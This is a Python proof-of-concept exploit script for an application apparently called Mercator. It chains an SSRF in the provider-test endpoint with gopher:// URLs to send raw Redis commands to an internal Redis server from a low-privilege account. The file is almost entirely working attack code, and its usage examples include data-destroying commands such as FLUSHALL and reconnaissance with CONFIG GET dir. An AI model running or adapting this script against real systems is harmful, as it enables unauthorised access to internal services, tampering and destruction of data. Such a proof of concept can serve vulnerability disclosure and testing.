#!/usr/bin/env python3 """ Mercator SSRF -> gopher:// -> Redis helper. Sends ONE Redis command (or a small pipeline of them) to an internal Redis instance through the SSRF in `ConfigurationController::testProvider`. Why this works -------------- 1. The vulnerable controller calls `curl_init($provider . '/api/dbInfo')`. We append `#` to our URL so curl drops the `/api/dbInfo` suffix as a URL fragment. 2. libcurl in the deployed PHP container speaks `gopher://`. Gopher URLs of the form `gopher://host:port/_` send `` raw on the wire after dropping the single type character `_`. 3. We URL-encode RESP-encoded Redis commands as ``. Redis happily parses them and executes. Auth ---- Any account with the `configure` permission. By default Mercator grants this to the `User` role, so a regular low-privilege account is sufficient. Usage ----- # Single command ./bin/python3 ssrf2redis.py \\ --base http://127.0.0.1:8000 \\ --user lowuser --password 'Lowuser123!' \\ --redis 127.0.0.1:6379 \\ --cmd SET ssrf_proof 'pwned-by-low-priv' # Pipeline (commands separated by a literal ';' token) ./bin/python3 ssrf2redis.py ... --pipeline \\ FLUSHALL ';' \\ SET marker hello ';' \\ CONFIG GET dir The script reports the flash message returned by Mercator (an oracle), not the Redis reply — gopher is fire-and-forget here; verify the effect with a follow-up command or out-of-band check. """ import argparse import re import sys import urllib.parse import warnings # macOS system Python links LibreSSL; urllib3 v2 emits a one-time # NotOpenSSLWarning when imported. Purely cosmetic for this PoC — filter # it before `requests` pulls urllib3 in (disable_warnings() runs too late, # the warning fires at import time). warnings.filterwarnings("ignore", message=r"urllib3 v2 only supports OpenSSL") import requests import urllib3 urllib3.disable_warnings() LOGIN_TOKEN_RE = re.compile(r'name="_token"\s+value="([^"]+)"') CSRF_META_RE = re.compile(r'name="csrf-token"\s+content="([^"]+)"') FLASH_RE = re.compile(r'(Could not connect to provider[^<"\']*|Last NVD update:[^<"\']*)') # ── Shared scaffold (identical across the Mercator exploit scripts) ────────── def log(message): """Status banner — emitted on stderr so stdout stays pure result data.""" print(message, file=sys.stderr) def die(message): log(f"[!] {message}") sys.exit(1) def login(session, base, user, password): """Authenticate, print the login section, and return the CSRF token.""" r = session.get(f"{base}/login", timeout=10) m = LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found on /login") r = session.post( f"{base}/login", data={"_token": m.group(1), "login": user, "password": password}, timeout=10, allow_redirects=True, ) if r.url.rstrip("/").endswith("/login"): die(f"authentication failed for '{user}'") m = CSRF_META_RE.search(r.text) or LOGIN_TOKEN_RE.search(r.text) if not m: die("CSRF token not found after login") csrf = m.group(1) log("[+] login") log(f" user : {user}") for c in session.cookies: log(f" cookie : {c.name}={c.value}") log(f" csrf token : {csrf}") return csrf # ── SSRF -> gopher -> Redis ───────────────────────────────────────────────── def require_configure(session, base): """Confirm the account holds the `configure` permission.""" r = session.get(f"{base}/admin/config/parameters?tab=cve", timeout=10) if r.status_code == 403: die("account lacks the 'configure' permission") def resp_encode(command): """Encode a single Redis command (list of str/bytes) as a RESP array.""" parts = [f"*{len(command)}\r\n".encode()] for a in command: if isinstance(a, str): a = a.encode() parts.append(f"${len(a)}\r\n".encode() + a + b"\r\n") return b"".join(parts) def build_pipeline(items): """Split a flat list at the literal ';' separator -> list of commands.""" cmds, current = [], [] for tok in items: if tok == ";": if current: cmds.append(current) current = [] else: current.append(tok) if current: cmds.append(current) return cmds def fire(session, base, csrf, gopher_url): """Send the gopher payload and return Mercator's flash message.""" session.post( f"{base}/admin/config/parameters", data={ "_token": csrf, "_method": "PUT", "active_tab": "cve", "action": "test_provider", "provider": gopher_url, }, allow_redirects=False, timeout=20, ) page = session.get(f"{base}/admin/config/parameters?tab=cve").text m = FLASH_RE.search(page) return m.group(1) if m else "(no flash captured)" def main(): ap = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=__doc__) ap.add_argument("--base", default="http://127.0.0.1:8000", help="Mercator base URL") ap.add_argument("--user", required=True, help="account login") ap.add_argument("--password", required=True) ap.add_argument("--redis", required=True, help="host:port of the target Redis") ap.add_argument("--cmd", nargs="+", help="single Redis command, e.g. SET k v") ap.add_argument("--pipeline", nargs="+", help="multiple commands separated by a literal ';' token, " "e.g. FLUSHALL ';' SET k v ';' SAVE") args = ap.parse_args() if args.cmd and args.pipeline: die("use either --cmd or --pipeline, not both") if not args.cmd and not args.pipeline: die("provide --cmd or --pipeline") commands = [args.cmd] if args.cmd else build_pipeline(args.pipeline) raw = b"".join(resp_encode(c) for c in commands) gopher_url = f"gopher://{args.redis}/_{urllib.parse.quote(raw, safe='')}#" session = requests.Session() session.verify = False csrf = login(session, args.base, args.user, args.password) require_configure(session, args.base) log(f"[*] sending {len(commands)} Redis command(s) to {args.redis} via gopher SSRF") for c in commands: log(f" - {' '.join(c)}") flash = fire(session, args.base, csrf, gopher_url) log(f"[+] flash: {flash}") log("[*] flash is Mercator's view of the gopher response, not Redis — " "verify side effects out-of-band") if __name__ == "__main__": try: main() except KeyboardInterrupt: die("interrupted") except requests.RequestException as e: die(f"could not reach Mercator: {e}")